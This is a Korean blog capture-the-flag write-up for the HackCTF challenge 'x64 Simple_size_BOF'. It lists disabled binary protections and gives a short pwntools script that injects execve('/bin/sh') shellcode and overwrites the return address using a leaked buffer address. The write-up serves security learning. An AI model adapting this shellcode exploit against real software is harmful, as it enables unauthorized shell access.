
[hackctf] x64 Simple_size_BOF
sangjuns
·2021. 4. 18. 17:34
문제 소스
보호기법
gdb-peda$ checksec
CANARY : disabled
FORTIFY : disabled
NX : disabled
PIE : disabled
RELRO : Partial
문제 분석 및 페이로드
from pwn import *
context.arch='x86_64'
p=process("./Simple_size_bof")
p.recvuntil("buf: ")
addr=p.recvline()[:-1]
shell=asm(shellcraft.execve("/bin/sh",0,0))
print len(shell)
pay=shell
pay+="A"*(0x6d30-37)
pay+='B'*0x8
pay+=p64(int(addr,16))
p.sendline(pay)
p.interactive()
참고문헌 및 힘들었던 부분
'War Games > hack-ctf' 카테고리의 다른 글
[hackctf] offset (0) | 2021.04.18 |
---|---|
[hackctf] Simple_Overflow_ver_2 (0) | 2021.04.18 |
[hackctf] x64 Buffer Overflow (0) | 2021.04.18 |
[hackctf] 내 버퍼가 흘러넘친다 (0) | 2021.04.18 |
[hackctf] basic_fsb (0) | 2021.04.18 |